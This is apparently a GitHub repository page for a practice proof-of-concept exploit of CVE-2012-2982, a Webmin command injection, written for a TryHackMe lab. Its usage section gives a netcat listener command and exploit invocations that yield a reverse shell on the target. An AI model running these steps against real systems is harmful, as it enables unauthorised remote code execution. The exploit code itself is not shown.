Skip to content

Practice POC scripting in Tryhackme’s intro poc scripting room (For Linux)

Notifications You must be signed in to change notification settings

CpyRe/CVE-2012-2982

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

7 Commits
 
 
 
 
 
 
 
 

Repository files navigation

CVE-2012-2982

Description

file/show.cgi in Webmin 1.590 and earlier allows remote authenticated users to execute arbitrary commands via an invalid character in a pathname, as demonstrated by a | (pipe) character.

Installation

  1. git clone https://github.com/CpyRe/CVE-2012-2982.git
  2. pip3 install -r requirements.txt

Usage

  1. nc -nlvp <port>
  2. python3 exp.py <myip> <vulnip> <port> OR python3 subprocess-exp.py <myip> <vulnip> <port>
  3. RCE!!

About

Practice POC scripting in Tryhackme’s intro poc scripting room (For Linux)

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages